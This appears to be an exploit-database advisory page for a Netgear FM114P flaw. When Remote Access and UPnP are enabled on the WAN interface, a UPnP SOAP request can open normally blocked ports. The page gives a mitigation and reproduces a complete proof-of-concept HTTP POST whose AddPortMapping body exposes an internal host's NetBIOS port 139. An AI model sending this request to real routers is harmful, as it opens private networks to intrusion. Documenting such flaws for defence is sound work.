Netgear FM114P UPnP SOAP Request Remote Access Vulnerability

vendor:

FM114P

by:

SecurityFocus

7.5

CVSS

HIGH

Remote Access Vulnerability

284

CWE

Product Name: FM114P

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Netgear FM114P UPnP SOAP Request Remote Access Vulnerability

The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be intitiated through a port that is normally blocked.

Mitigation:

Disable Remote Access and Universal Plug and Play on the WAN interface.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7270/info

The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be intitiated through a port that is normally blocked. 

POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache

<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string"></NewRemoteHost>
<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewExternalPort>
<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">TCP</NewProtocol>
<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewInternalPort>
<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">192.168.0.6</NewInternalClient>
<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="boolean">1</NewEnabled>
<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">NetBios</NewPortMappingDescription>
<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui4">0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>